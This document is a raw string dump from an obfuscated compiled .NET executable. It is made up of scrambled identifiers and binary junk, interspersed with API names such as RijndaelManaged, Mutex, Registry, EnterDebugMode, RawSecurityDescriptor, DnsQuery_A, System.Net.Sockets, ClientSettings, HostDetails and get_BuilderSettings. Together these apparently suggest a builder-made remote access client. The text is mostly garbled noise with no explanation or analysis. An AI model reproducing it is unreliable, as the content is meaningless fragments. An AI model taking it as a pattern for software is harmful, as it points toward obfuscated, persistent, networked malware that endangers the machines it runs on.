#=qXKuFJhTO9qh0nlK1iXbbSH7y8Djn0mggfIDxOoarDyE=
#=qXO4A8$YrN_OoPhFOn$Hhtg==
#=qeE3S$kdx9R0s10U9GzzcFw==
#=qaWedjkiL7CWj9EfMXrEg6Q==
p}|{
#=qFxElXT3T_$sB_0gpbmQGIA==
SetProjectError
cPU+
BSJB
#=qamR76KZ1klLpv5s7oSbjxA==
{ES
~<EV39
#S!o
\5j2
[+).h
S/+
get_DeclaringType
#=qc3tkHe_7v$eGA2x6krh72Q==
#=qKdZKgyAqL_iP0GUSJkXePw==
BCQ`
GetManifestResourceStream
~>!@
#=q6uKQziMZIL8_PaX2KpbPTA==
-8JU
#=qE8a8ikTp6zyXXyhNYzK8Wg==
BitConverter
#=q7$Vba9f7UkS7OwkHeUGtrn1ymWXBIMnyiJbrBxyOPBM=
#=qL6PdpQwMNSdyVKw3FgboNw==
#=qM9NIml9iDZh$Fjh9MocFWw==
rFJk
get_X
PADPADP
#=q5esm6BVWqrzEai7Zgw0cmQ==
IntPtr
&B:~t?
Wqh4
(D20
#=qwSqLSPEuM8lJy4sOeuH92YjPodcLquqdG$OodozwC60=
&+#+
#=qKxYY$jYG8_7mT_7R0n5jfw==
]SsC
#=q9Dmi1iXzL1JAj2RiS$Q5mw==
N9|pm\
#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA
#=qHy8pXlBCL$mvAXWQDJUnVpxgTTYNWuQ4Z7NdFPUhcZs=
#=qyo6slTMfgD8IrZ7nr6inHA==
#=qul8YRvQj1pWpo4_UxgOSzOBvtncEE$VPCzTeLK_rIz4EnXxineVkwF$lTxruKPxr
#=qJtsKc7ccoU8jRrRMGJWqhA==
#=q4fCxMFfzJ9KgfK61DJRvZ5wDvDfYnqR8bhY6TGq9aRk=
2*zm
Microsoft.Win32
{ZsD
ffeeffefehah
-$+
+G~Z
7q[
#=qee1h2XwRBJvy2g__X40enQ==
7?<"
#=q8eJA0L4q0RMnuOJCvpFj3133vZRxVnxvHST9vysUWYQ=
#=qm_Podb$DJ6CfxMwMnaj6heXfc210URbSx7p$rJGFPmA=
]:"
#=qt0$GxMKBUHqpa$X5z4IJNA==
& -fM
0=)M
USF2
#=qJLXxSZzWSVDQjBBC8RxpqVbwxFaxTu3ygaLrjLvlmTw=
p+TX
#=qs0qPjhSgxy3k5gj_gt12EQ==
#=qbWN2780y2PKcyDt_4uktmA==
3Y "
InvalidOperationException
,>~,
r[D}E
#=qZHoyzaJ9rjmsFI5qWuYXUQ==
T,*Z9
#=q7wyeNFqtiGUhQt6sicod9g==
#=qhq3FXVXLOItNPwDlpFnTKHk3JkInaJiiSE3uR3jtGH8=
`q-
)+,M':G
ohmI
System.Net.Sockets
RVK
RijndaelManaged
#=qEIGjjvppBA3BShbdBfMkQQ==
#=qoTGj8$mBoje$u1RSJ6obYA==
FileInfo
-"~Z
#=qGzqsy60d_qAVRip0TvyGow==
#=qSJci08l8EqyD9KF0joWzSA==
-U}{
&+6+
#=qAR9aFFQPEovpFzvfokoGkw==
-&b|
LogClientException
r8C
&+:+
'GS>
UnhandledException
#=qr1BSJWWt4_gjKhDM1XdrUmEEDWmH$7z1xaJvthJ97EQ=
kzK2`e
#=qXzCb60v8h3v0rPCrGf606Q==
BlockCopy
%a>w
#=qdZqWoaYN68rlMOX4HkTLdA==
TimeSpan
ur>T
GetBinaryForm
jwsk
#=qWfwpJtKOXBFXf_1zpmLUrQ==
Mutex
#=qjlBNihUiUO2oBJbOEbdB4u8xmfTL9EQ3AEFa$nrdzJY=
+Hp]
ffefeefeffe
QOJ"
P6@w
w4!S
#=qChPTKc$8xcHrcle7anHYNe0wH_TweGkex2nGe9n8WDs=
#=qLKYxZZVHP8wT4ocBxnjPXg==
#=q3LvM$oW1poDdLKDT_N_s4w==
|lol>1
1`>
FormClosingEventArgs
#=qAsxHG9v$MAI6$NruMbxEjA==
>JM>
fefefeffe(
,~:
#=q02vg4rlYSKrSiDNi4xWbtg==
8*E0
BinaryReader
YP#g
#=qAlVTP0_ZXWJdoW5RI3VoXQ==
#=qccx4d_xNMPrZUHpmyYb7fIKkXAFa5XEyOIxXg$XLtBw=
set_Key
Jtz*
IA9](H
#=qVvEn7vdm6JlvG9koG0JUIQ==
g6rLkX4
yhaa
#=q$JqWZLd6UPV3jmsDHksd2EmkHWISQtPlvGx8vZ7hHXE=
m>2,
#=qg9gWuHgvaa6cHg9wj9NSQQ==
fefefeffea
#=q9DR9MBj4z9rQMPU2Q48EqjtFhU8AMGWHK02_s7IakJ8=
Boolean
oNjD
#=qo5Pv9nXCIU9X_B8SJDUR_qgp7npNK2pA1rGP0GNQ51o=
hD*e
lcG.
set_WorkingDirectory
|imj
#=q6Aboe3ONIkez7GgqcdWPi0_vrT_i53_89HUeagGM6MThXvFkvl8hpSeHO1UJawKN
#=qYI$MiBdzcplbf7GqrUf7Ig==
.3+
#=qK4wGebauvtmTKO0oAyLFzHLhr9rU3HNJmU_ur7Zop$YvLzV4HzmIQ45YslW_q1Vc
-m,Ol
#=qFv$qWif57TCUNsu_O3F3gA==
hK}u
- &{
#=q5XjI6hZlPIrXq2h2btB_pVJgDh_o3RXkWrFCxLCG1E0=
vJ4:
kvqX
</x6Im
+ +
qS^Z^
~ OOb1
Gy8U
kvN4
StringComparison
#=qYCS3QLrXk$FWhHR$BIzDXQ==
*+
l93.O
CompilationRelaxationsAttribute
x 1R
#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=
\Npa
,+
0nR
ReadUInt16
ReadUInt32
#=qeeDSInMnFASKK3QXGIKUxuxDb8FgGi0XLXRlZ2oJdWM=
- &(
#=qP6OAxyfxw$Mj0oVKCDnh2VZfwY2Ap_uDBmUyxkn98Eo=
};D/
#=qTLmFjOt1Rq5$fqQEFVZ2zg==
.>b&]
,+&&
{di
IK;nz
ResolveEventArgs
- &8
1GL
#=qeKiN0Pwa0MwkK0uB$Ook97TrMQC$LNj1jgF6xTuSA2g=
bM$q
#=qmvGJ0E7$XHigSQAtHtZ6z$on2iAwFLBiFtrUR$DFhQPAtVI2LIgzNztIgPvlO9K$
#=qhVWucYSqOmMmp4RgG95tFA==
-?&~]
#NZ,
X"%<
QueryDosDevice
Random
u( .
+ +
#=qoStPOR6UymX3IGbwW$iFxA==
ThreadPool
#=q51SFR_Fbl10nUMKjGTtHqA==
IPj&t|.
#=qrWKlHKCxTKueolOR4ohc7D_cBhjLv1zNIcftgcigaGU=
"uCR
-'&oN
#=qKoyC_0Y6bPLCPvDcJr2y5A==
Az a
!prr9
;^!F
Ws_8
&*}%
#=qqReemZdhHj1veATVZbU2_Q==
#=qd8WIZO8f6IRqdUmvxawj1w==
@bM_}
d <I
6iU\vx
HideModuleNameAttribute
zR;G
]*6htv
Xa ~a
.o<%
bC)a
buz5
CAX?
>93\]
4%(L
"h^Q$K
Microsoft.VisualBasic
1U}r&P
&A)qa7
#=qehEpCuPIxZRbHczlt$dAWi4yWi9o1_noSvuo$Wzvtyo=
Qy^P
WriteAllBytes
ArgumentOutOfRangeException
hh%X
EnterDebugMode
--&&
|hI}
X*]x.
M~_I
HostData
= 3}
#=q7rZvZ5LmWDFo52hBeGb87g==
set_UseShellExecute
$.q
#=qokX_wSaMFvPLXvDQY377gw==
#=qrpluguOr5I7WIqr51cA8ZQ==
#=qtxvtUAtG5kwD1CbaXqZpxrHWaxR5CiRO2OiaCLfsbSk=
<D.v
/% ^T
16LJ
sj<$
#=q2XZFEYqbf67s$PRf9Xyx7Q==
%^ d
yI[(
Rectangle
#=q5QHPwKvqpNRA$cKFBj8i9w==
#=qUaHlQloQ1heHsricyshXiA==
U8\|
3d2/
,d~9
CWnOB
9X$T]
<lvMR
#=q7EIL8N8VWglyI984D7TGpzIPvdOcvYIRRwfMeKNyDDs=
#=qMoRe_p4fasg7BcMJcnicWw==
#=qsx3W$FQbKM7QI$Z1TXWW5A==
d,2+
+.+
Concat
#=qkxzumuLbzy2O2XsBlM3j$g==
#=qGHv1IOurZ6januU0XCThS7E6H0kqAtBD9d30RkoHFXM=
#=qNsyg$dsR$GJkSvK2TftGTNPuC8S809j_UmmfNnXTTOo=
StringBuilder
#=q2WFu5tRyicebO6UkQga8SbXrngw5YigfLTTVJqQy1qI=
6xlo
J =n
#=qhbsl5nSqHjmKK5u9FniHoA==
#=qo_N0HkUaMUQFRCOsgr2ciQEl_IzgJy64oQzCRnN$Qy4=
[in2
ReadDecimal
#=q9tI5WfBIFIPW_84mZnHV05cJ9fSyOCl9wA8lwPxs3PQ=
B.rsrc
-&~L
#=qiO2giJomMFK1wa5$389nVw==
)#}&H
qks(*
sL2qd^o
ffefeeffe
N~db
#=qU0vjurWIhbfq4$RoGXKKVfTj5MJBenZeu2wAtoCJAJY=
G-l;
Bu F
ReadDouble
#=q9WHClFSp7T8oS_DNFEbAHQ==
b/j*
#=qHj$POo$6pkhWHVC5cES_2g==
CompilerGeneratedAttribute
`?R(
#=qORcQ89THKgijJ1sWRyjf4hLd1g4H_sosI9t_gkVfZ7g=
#=qcyVktfYxc51I1XopnwGNjQ==
Main
#=qKXbEtqEIo3E2xdYWIElxIQ==
#=qb_soGTESOxGbPyWr9RZjig==
s\As
#=qKpwDTqgBVuprqflj1$7QZw==
bZN1
Le8
#=q6k7flm9GMlPIija7ZH1xJg==
{>Qwd
B/<2
#=q1t2S$ib6pQFvBWAJfG9B1Q==
lwI K
i8Tb|
BZZZP-
ChVw
z2myQ[ya
@8"!%
2&
Copy
#=qwGMLoIBYlotM6E$y2KTAuQ==
#=qzTUdhpx_l8oNrXik8Q6a51kZkIp$waiEMbjMOU1bFOc=
-03u
#=qC6KOBEMWwIsQr_847d$S8A==
AssemblyFileVersionAttribute
#=qZDHx38VzWszDP$NdqQpGo3ak_Z$zbLpODJse1_Sr2hk=
p}/J
~2`k
Transmission
System.Text
GetName
[Ocx
#=qcCYGLZOh9EpzU$sjJG8ZyQ==
#=qHtBOSXbLfhirIdzL218uOQ==
afeffeefef
!F;kR
#=q60UcvJzzgao2Rv_stV3rQhhxCdm95L1Gb83mKGH1VxQ=
WriteBlockData
^y :
#=q8WaW5L3_NY3KPDRN6V9mCI08mHUZbTcARcexWvaAL6A=
N?nx
MessageBoxDefaultButton
q 9l<
#=qJMNT6BwQKSi707UHw9_x7oci6egKjto_AgHYlITH34c=
#=qmcl1D6lgUOLuKGFFyxMamg==
7FoM}
Collect
%`A)
RuntimeMethodHandle
#=qWFEttW6Y2i$LC7_zLCNdFCiHtPH1yR98w7TbmrS4vUE=
#=qa6Qg4SaIgpIknX0EmOdEQg==
#=q$6NbEg0Hb4neXdXPgEgHJA==
IClientData
[W?v(
*P L
#=qWQUgmvsTzj15wSjWQHZnng==
#=q8Lz$o21atQxw0qUwF07ufqfk8jjJrspNc$L9E2y_kjQA$2GQzuj5BmjDMXRcd0oL
#=qfozjXlIKX6LyHHXB6wCG9g==
PWnD
#=q$bBbU_xpGfMMkAvp45SBRg==
#=qFikK0kKzvE4fvbzxpsrllMMR8oLIJtNPAGP1lZZ4prs=
I'%m
K@;1}_
;l43
1.2.2.0
#=qsOMWyP3LvE9$utIXVnRnmQ==
kdui
#=qlV3FbiF00r5Vrp5nqoncyxDHZMuHB7yuJa7xS77K3BQ=
R|pi
!PX/
#=qrEy8UTPh_zjKUNPlgJ2H5vQaVxSgPloAxSMCkFttuk8=
#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=
#=qk$cpdn6seqbcKjxGnztc4w==
ma
#=q62cZqzG2QOltpyG5v7exPQ==
QkGtk
#=qO$LkcjIVULy0PGjvpOiiEw==
Initialize
#=qqLLpPwpASXA1wqOuY2RNlU8CTc57bQGBfHWaLDgrCKM=
GetAddressBytes
!#d"
#=qPfVuk6552RtecCgHDnGSkA==
paU)
#=qSyCMza09ItB79lrZlFBuQQ==
8"m_
get_DiscretionaryAcl
o5;N
q9i l
7'q8X,
txVM
#=qXfm3QhQkyfcZgbFdAZgHHmadm7n1N0mfKcKBqrdfAk4=
($i\
(a
MSgL
RawAcl
#=q2Xp4jW9C8Ta21HxmpVVhKkrHyOAsktLziyvL$pPr$5o=
w'S`
~XQwM]BE
set_Verb
#=qXCUD4SfDr7DmFI64sweGXTg5Ns_ZxTOZPqBRcEKWTQk=
#=q3C4Iol1nMl5AFLWNdE6nxB2_kG0uXzx35vvsn$gQzt8=
O.`V
- &+Q +
Show
-
h.cU
yUm
GNA
#=qEWXagqzV$_PB$92aNfTAHdvK2qw2uvSxy$UVh0K_lso=
Y(w
"b1
W{_C1$
#=qdiuHngY4wejUsgFY5u7CtQ==
My.MyProject.Forms
#=quFACL_$e$cUEIexpzPXS7w==
y-/mO
2&g
<2+e
b$2%
#=qwnMPoJqYBxCKR$s5x3I3EQ==
FromBinary
_CCK`i
hN7+
Evx,
:vOSD
#=qEhveuZChxbRj66Cj2kCGjw==
le8
>i~~
String
#=qyZOtLxFf9zA2x1ff4_5cOg==
#=qSYke1CBEgOP5WhDQ2wCOhA==
_CorExeMain
#=q2n0wwv9OpsrMrxVUVHoqGw==
~n<*
set_Visible
E?N^~V}
SearchOption
Q.'
shkn)
#=qw39MYiiaN1XJbqsDq$LgQw==
kmA
(+&[
KeyValuePair`2
`Zk
HostDetails
#=qB4sApeDyjGxBivHLwR3FTJejGBlbih3hr3f3TS7BFbY=
Timer
#=q79YE7jk$t8I7uIUVykHcVA==
j,!y
2CaM
Mpld
&+T+
~l:
#=qsAejPkl5V6B3npq6homyUA==
-&&~r
twml
I9S6
Microsoft.VisualBasic.CompilerServices
#=qluYNp43cwlAh9yLdLZolDw==
NNEF
KI zbO
-\&(#
get_BytesTransferred
#=qUUt$Zm9DEy7746wMpw0nOgKcClljRPRKWyhQ21GyaOQ=
WSt=
@[6x)
EditorBrowsableAttribute
add_Completed
get_InvokeRequired
cVQg{
#=qS8syUoAGHVUW8$eQd6_3_g==
#=qGGQk9IvbDfVOJG_jRDHqOA==
#=qUvO$SDWQpHm3uJq25yzwvw==
A\^cf
+@|
]6|zX
#=qOYQA1S8VHR$mOO6XXuyF9Q==
-(&s8
#=q91nKS7P$i0qKCqvUAPW9EQ==
#=qDJlWEiuGwuVXAz8yc8z7OaMssRYN4hP9AHespNOmdYHus6_1XkNOC0rqgHeRZksg
AceFlags
#=qsB4PatedVyMOyo9s5n1OTA==
User
get_BuilderSettings
8J~
#=qqIzVXHiNuUY4ZNiSxkqEGQ==
ne4mh
*z=}@I
DnsQuery_A
4System.Web.Services.Protocols.SoapHttpClientProtocol
j-_E#U
get_LastOperation
kdsd*d
get_Buffer
R60
#=qKtJTKEkNf2mJVHcZzSW8iQIcsBglzcJJOkX7V_uB55w=
set_WindowState
Load
#=q8VTskDJ5TyHJcDeWmklddw==
#=qjryTBW16mUfo_ItH9KWoGQ==
FileCommand
/evF
#=qzRcQ_b8FoTlpKT_BObsgBl2bj71wU5HcYdpIIgiTJ5c=
C3 b
#=q3cm0QwDyNYr2y$xvkCk9bGbohRfuMuxkahGwLy466GA=
=ZEup
#=qaRJX6K2L3xhR1w3zuwE79w==
System.Drawing
#=qfGQBFs$OKLefNYKSta_Lbw==
Y(zn
vl\XXf~
#=qN$clRL1tbKGnARF7__FwJg==
N>6f
CurrentUser
#=qUWYBucdXrqr2Ksc_3qKZcA==
yFZW
~Q{
#=qJOtLSdKNdNGjNNoElacScY2TTWmLUvN6XZsl_FLfP4o=
#=qRIR1iTmdtHs$eBwEdoKphw==
M@/#D
!ltB
#=qhA4OqIvVSMpJakxtoytoCw==
Ya ~a
Dictionary`2
GetFileNameWithoutExtension
BeginInvoke
ToCharArray
nS"78
~utVN
-R+Q!
get_OSVersion
#=qGqugi8s64S3wxXEod1SSyA==
Dispose__Instance__
#=qbpvfREN3OwaXBj6J3WBAim$AQyJ99fz1ef01qn6kVrs=
xb{(tD
bhh
iTW z
A B
#=q0pfW5T3uO1I6LyXSPFW7Qw==
#=qFZ8xm69Cd0C55Ip2ORf7Ng==
\J-Z
AddressFamily
1~4"
HLjXI
L[(x
*!;!
p6(#G
get_IsEnum
\V<(VC
&+4 +
KkuHg
#=qXULhMbqiur_al62NrjaiXWJ8rme0bKMO8KkV356NZwk=
#=q5mGK9suCIiUDZgS_YSrSQg==
$'}D
,-
p 71CO
#=q3TG8MLoZf1Y44PREVW$6m76IGmuYE_BOhC_OTjkQJFtYWwRtSeFqevP9hiteuLfz
#=qxG$Aklpbf6gyBfAqTMmORA==
{s6
RuntimeHelpers
+[~u
;Koar
- &oi
Tl$zXz>W
/a[zZ
- &om
- &ol
- &on
affefeeffe
#=qOxeV7mwtJT4AH3HtBqNUXw==
- &or
#=qTMXjZFh8G1ehMXQzo1c_k7izR$ZNvDyCJY5aoZ0yOe8=
;Gh'
'a[
Kwr+
gf:|\
#=qdObzsTSX0MpvDi$OPjsFh219oh6Iw7DshgNWGveAvBQ=
#=qwK7$pNtMfqKNZt8gGYd$pw==
a/KY
VariableChanged
#=qxRbSDXwo6eARhpCjqJa2Fg==
#=qBpzegr6XzkmtwALf7kKPHV3RZVAWYLbYE79PiG2zXYs=
\1l)z
#=qdDrSQoelY6gHzRt_ma5NQg==
WellKnownSidType
@ 4^
{MMi
RawSecurityDescriptor
Object
#=qCI9CHxEGVm3HnYdn52IpdQ==
ReadByte
~zpkeF4
#=q0QKFCbf0u_IpV5ISOWOl$Q==
Registry
S^MR@'w
note!
#=qaxeBDkuvv4PncQ$UM0p8ag==
#fcP
w:ub}
ComVisibleAttribute
6`#-
*yspGL
?ir7
|$rM
#=qzAgp3UwWT0075L6Sh4PfZA==
E*~U
lq.zk
VzIN
"u31
h|59
#=qA32zcbPIWwOaURCE8zDGfw==
-1&
HJgxe
d;"E
lqT
0fr# YJBW
cV?g
,.&s
uM\{
jYDU
$k*=
#=q__Bys7JTXmAiG9F9QC$wjw==
@$j^
#=qAsEDmMyJR5b6o5oAn_4$qhqe51JCfsU9Gffe156c8UU=
#=qMpgSfrZ_Z1PFlMpqVHDctw==
JlUyX
EditorBrowsableState
#=qUlcwHJCewxIUk2tiKMDjXYc$Hb1k7TCZCyGdm6C93UA=
#=q9x6KBL_arYpQC$zFf4pEFQ==
J~6B
<r0M
#=qzDzg9a$HVGG1G5cdhqbdwO3OG_SFijGXN8Towa37$TQ=
#=qQyvT61RAfdEUvn1jBvcx0Q==
#=qg$lb3t6abG6vgSpzSjJlb_$AIzqYfos5cl9DWFolUwM=
!\mA
#=qDTvHA26pSwiGBDknUzewBVNt3YGW7YeSiQRH8F$_CMA=
^^n,}
#=qiCTCgJQkyH_Kzq$FT43G4Q==
SOs~J
2 W1
#++
`.reloc
/Z4J
b*[9;
Hashtable
#=qYMGXxffne_DlG2tyCliUw119RPUt2rJt6SWle_TPkBA=
XkR<
0ZuZ/
#=qy7SaTx6mT2Pix1CP6ET1Hw==
#=qiY1B9yU2oVkPHxhn$y67SFTP8x1Jb0botGqdUGkdpQg=
V!g"
+N 8q
_123
#=qdsDfPo0zxdY$R7euM0a_vw==
#=qI5Vms5JVXaVkwalJFV3L6w==
#=q99eEsMLSp2$EVfl66Ua2d1YMqB58RPj30lLgJzJJ64o=
#=qzx697Szk1moqO$yUynaioQ==
, (g
Stream
8@sY
#=qBuMzaVqxpYkDVtTnLpbYyjTfZNKm8_4JkuoFHPxOBFo=
,
System.Windows.Forms.Form
&0.h
IsNullOrEmpty
{'7`
#=qW1Ty88cS3yMuRwgBrH3qpw==
-$& ,'
SRNTz7
^YkG#C
[z4[@
-k.p
5hpp
,0&&
Exit
G2yNn
G^_i
v2&{oy
I{Sh
L5}Pjs_
#=qhWn12I_bGxHfrIrnto3QAA==
- & (
#=qs77tphQ2NXlLwCZkimhHsowpXGqSYmOGtKiGHHIs4aA=
#=qy1cXcK8A6uRpLlCz7UKkNw==
,Y;JU
#=qGjStw3GYbvUue5kapeAzmPJAl5$UDUb723PSvMiCGdU=
#=qR0v_DeAkzbUr6_Md5tN4PQ==
Bw"/
#=qFaxhQMbuEyPeOadTfKIzX7ulwKfSulnteVvHU$QDlcs=
#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=
TW `
#=q9c$dxNln4J1nxxC7UNVnfSKvSgKS421$zTS6z9ahlusddEno_MZclU7Qbfc$Fyw5
#=qRCCuvWFd9_O8CfEZhkJtSA==
#=q5s6lzZCgRNNe2Z9HZfa94HOHkpUfSnAwZsGo$hzh7hY=
#=qwdHHpd7UWv1_2lcOeunA18XKUsrG9D8S$xli$tkAMlI=
#=q5fG5Wo3pzujuJKotO2WwDQ==
;Cg`
vN?8
X xJ
#=qS8q1FyJsn2_ukKh5ONBATg==
#=qQUdl15sQ0xTV$45YaAtVB9Bx2NeRc0CC_5Lr_HuNXwU=
#=qxWNhTH3aUmlSLTvydVoCIQ==
#=qWCa2pDyuMnzTMLUOIIx_zqZ1n0nAbCh3XpyakFsKTbQ=
*}:-p!I#
#=q7Kx5VWqZvUxLZ2L5c7WH8A==
#=qbzig1$2CwLluEJt5uPtpgqPx5y_2S$GoPgJP36N8bTE=
#=qJ598Vnr_RIwGnHqFfQsYCw==
XV}%
#=qRLk0VFphuSTh16H1MGZUv_HwKU6b1$OQZ0l10zUjPKU=
f],H
#=q8uMGC19QD5WGzpkzUOu0SQ==
Z'f.
=R7
Details
WE[U
-xR
#=qYVgYkiAmhdTmisXUMVHYlJUHzcBdggj3Sn3nLI_MDJ4=
zXN+
&* +
;.
&m':
ExceptionHash
XaY
#=qJpz_ygP5AiHfhtTxRulSsw==
WaitCallback
OperatingSystem
#=qQ7tSKwAULKz8TSFsLbtapA==
MemoryStream
-#&
5s 5cM
rSNc
l5!8
Zero
&+O+
EventHandler`1
G-nc
#=qyYejfncvZCW4q4y4GEV7QqOL4Aox1NSDqQmcpM4TQVA=
<R0>
#=qd5f1i4cDO3tAO_bEb7g1cw==
#=qRYSdRGBC6LM4UFJJGQnk7A==
GetFrame
#=qN9oos_gePS4akhGX5rjcOjS2FNZJlTAkUnO0Ykgu7Rk=
dQ>W@
System.Threading
0ho#)
#=q1ZcUbkVKv7wahbk_Am8y6A==
Va?fq
#=qDJ8UKTQIGM$_7XkvuUdssA==
MessageBoxIcon
SetThreadExecutionState
3 ~]
A4
UnhandledExceptionEventHandler
#=qz5nGZygXT2sWR5FWGAcAzA==
hNEM
y;ja
oePA
$}ZL
{^Ar3
Hb6;
#=q5WjY_m3ubVFfbJuyu7GMxA==
+u_r
?xwG
#=qmL2H5Qgs6vv79mCqS$t3qg==
GetEntries
#=qfXdNdmKHZO9pILMTQ4gUIFhfl9KPJm2rU8y_LQsTH4c=
#=q$YUIMaEFO5IFZXBvo0kclw==
U=0)
-F&{
#=qhnLoeDP_EbzJexQQPp_LLA==
#C23
w{vT
aD6[
&+J+
#=qk77uxMCXAcR_2KMKgZiSng==
-T&s,
#=q8d8q1KZbTCKTAZreko1Lug==
Buffer
get_Current
b%
#=qkxH2pC1tIcRyW8E4TCtfHw==
W,
mq
|txmy
48 U
Z=|-
pqjX3P-c+E(
kKo<W
e&9^
<\ f
0d?,
#=qJY6uBmA7bjB3pfI3CAMZ7w==
#=qfpNcQ8IYoPRIQgVc_nBfXzVjxVN2nY_mFz$PcDXaKKw=
y1;W
#=q8T1neNU8Flp1WaNsBKnRHQ==
#=qX52fPnzDspvxDLERxqgnmVyN3O6kmNVEBrlqQ9OVPeE=
get_RemoteEndPoint
#=qQqZpewiWxGMAW$tQ9Rz23Q==
psbPJ
#=qgPQkZ3GBDc371jzhubcNPqmxfqhr7b78DNmenmuxGa8=
ry=5/&
vyU-
dG j~
o#R/"?
#=q4kB_KjL2oo8adT7lfnt6ew==
LoadResource
*!M&
Microsoft.VisualBasic.ApplicationServices
Gb~35
#=qOmCJCQ4xVqqqlvNEZD66Wg==
CloseHandle
g *;
#=qiNB6YyqAJbx2uPAiP1Ihw9dTNEtwaZElmpYLZcGO64Q=
2H^W&
!^[D
+
Next
AiP_
{f<8
+
#=qEDU5bqS$T9T0k2xHaznuPTNI8j4z6II52ItUe0wjyZ4=
#=q4P_5NYDHZX9MPbDZuNFOAbRpAmJ2c_TFz8M5ulhIFApTRNfzn3_E1__1$MVw8$WV
{W~~
#=qMMkhBs_8vtf4989qCM6TUw==
|taH4
#=qSbcOBh8Kf7zb$IciDxPlGw==
#=qwBDUI_NSPNLYbPH4gy$3uQ==
p po{
= UbB,1
![j
#=qVCHxDTr$$bwFMb6i9vBKRZciaa69edA3gsLNOty0RAzCorWRBUh2v0PgySYBEvZ0
5]6fW
aoLK-
Empty
get_StackTrace
#=qhufLjssUmkN_mXHuWOXl8gUDxidnVdWY$tHhp2HS0ic=
.NU{
bkZ,
#=qeAiPMWOD6_wvQ4$bYsFv9GLgsem$trQFsnkw3WN9igk=
34p_+
~J4w4
I2aL
tc.b=
#=qe0mY$R_rBsPIZZv3hPLS4g==
AceQualifier
#=q2dXdGRU_h62YVIUhgXBQJzEnralpXNvp017RQs19jjo=
@yiR
get_Major
#=q0M0RRypoNIjajWAugf6WjbxM$GiKS9VjK_mg6sI0TI8=
nM2&
&CF+!
#=qVXB_y3eN_sp1$Md9UoJeYQ==
#=q9heLrZy3cpWSk7do8VVthg==
#=q_ux9H7Sh7a2A98b6QB8m4w==
ga;-
#=qJdNCQZ8JQCfthL12ut8Zgnr9$rl3CuJQ4GAn54E6CXs=
#=q1A7nXYgjUuxh_0aV4fZMB87On7HuSdbeS8x$mfXfW2c=
#=qhFV5jkshUI$uRxypI6oecQ==
^ aP
4@s
-f&&
0+ +
#=qSl7F7iXGTH9iNXHds05fxcgA7Cydd52A6vZtHH_41F4=
[I<
#=qvJ_V3lJRnVEW6EI74n63zg==
#=qOTqiIHVN4TWDu4_xhgbifQ==
v2.0.50727
SetLength
#=q3VDCpnvucWhkt3J6zytXBA==
#=qxUvHfLZKZiUmPXUqPV8Vcw==
Ld_~(
I7%[
#=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA=
Vl<qt
_Lambda$__10
#=qvbTNBihG2zARsewkRIFTSQ==
\SF2
set_Item
ToUpper
vw(V
l;F?z?ap
#=q0zLeEY98tybLc8FS6iVEWjGp4MNZxETphcH7ohzBXuY=
DirectoryInfo
}a $/
#=q6tJHosKuF0IY3gGxjaveNw==
Y_ + +
#=qtkqHWk1kvmO5zt3tTCyF2Q==
M1jL
#=qbNq0eOj9Pw66KrsrDd4qnA==
#=qSpdFO0arrQmbwA1JpPKL4TCAmwZYVDNVmpRQ6ryTPgs=
#=q7O26Wc9N845khaV1IlgZGg==
]|"T
F}Ks=x
J/{ s
Exception
#=qG2DPieaEKCS$j6T6yTf$qg==
#=qIOX_rwHrS_RLFL2igzRsUQ==
C%(L
#=qLJcloNvItceT7R54Ssv5HVCoj0j2JUUq_dQXQpFZZjM=
#=q4KMIX0AcXAdYuUiSKvyy9Q==
& oC
! H O t
#=qR_QBxpRX$xZ1vjqVv0afDQ==
& oy
#=qbFnmVfulgLVjclcqmmhqFw==
]ROc
#=qtIl3MhjXHsnCHvTVFi9hFg==
#=qFMsFc_zvkhu_B2YTPJt9Yux7Vq8aZNOr3FA$mEdAzCc=
yHs:
Z6-yS
Zep|
GetTypeFromHandle
IAsyncResult
6.rp*
Xqr9)
#=qT9sog7FujhNJZHxxUXVGPg==
set_BlockSize
#=qqsKAc3v0igxVSmn4Feg8q$1tNTWiqtCBpA_xMlgU$f8=
+uG@
get_Connected
~@
#=qpaOobmVTnUS0322VEUTQd53tn4HeMWSoV2XuTUOmp6U=
B=h2:s
GetEnumerator
~J
SymmetricAlgorithm
#=qEKdoqcCD2XVb2atXAIOmL$Gnnk$r2oNLDVsEymHbxMo=
#=qOgcjmweVxeuvMU4cvcFOmg==
|_%?o
'RM4
<generated method>
#=qzjreg8z0D4BPrx4RxUJBoQ==
MessageBoxButtons
Int16
T,3k\3t
~t
V,qEE
PR@\
#=q8r1xTCj7grAlhMxU0cmrbA==
ClientSettings
#=qo8wG17V6QHcxsU4R0xmY_Q==
=b!3s
ComputeHash
?;"Gt
3?~Z
#=qtcncUaS1HcVKUD5AEGHBokWqEL$GDDjoAu8asy_oLis=
#=q1BpeNGUQvsUFoXPmB6q50A==
* 2 q %
^>H
ReadInt64
[[L8
ClientInvokeDelegate
#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
#=q1tLM5Gk001IDETj3RhJ2ESaIo2XgaV2vMWhqISqSHy8=
)wJ1&
PXlk
#=qkcPDXy2$GrSLn1ykhNxS$A==
#=qqn0Pbku3c3j14idd7rNOJmIbi4WueHDQGNjxpToWe9w=
Enter
mST%
/(~,
nk0Z>
GetInterfaces
FileAccess
*N(A
~2
H{>n
CommandType
p EC
-0&sY
#=qRACckQ0ejzlKZgeXX_CPJUyKbl7Zu7QfhWW6eMM03VPusMYB8LREfJZQVcTGHBm_
#=qGgXamaT7IeK3DM0oRfGI7LZg7FrEWNz8CI_5MUlFEJw=
E=?j
get_LocalEndPoint
#=qcyp860KJctHXULF8nCr1oMRR0y2kU8XZrQHqsInbsAM=
zsX
#=qZ79zrlLw6T9kJCHt$e306HkmYpQl8J1ugf3bmy8tycE=
$?Ph}
#=qTYemjRfvVDuBO5lrz3Aq6g==
#=qyEH54IW$f9fUJb7FOR8r3vj6e$onLGrpm2VGycjbl9TZJEqkwtA4y4bL9ExOWpiA
System.Runtime.InteropServices
ly(
#=qqMkZyGiL$PHkYblZrq1S69029tlEdPXkxbM_smmrcRU=
zsJ
RemoveValue
GenericAce
cN&@
Math
o6 rk
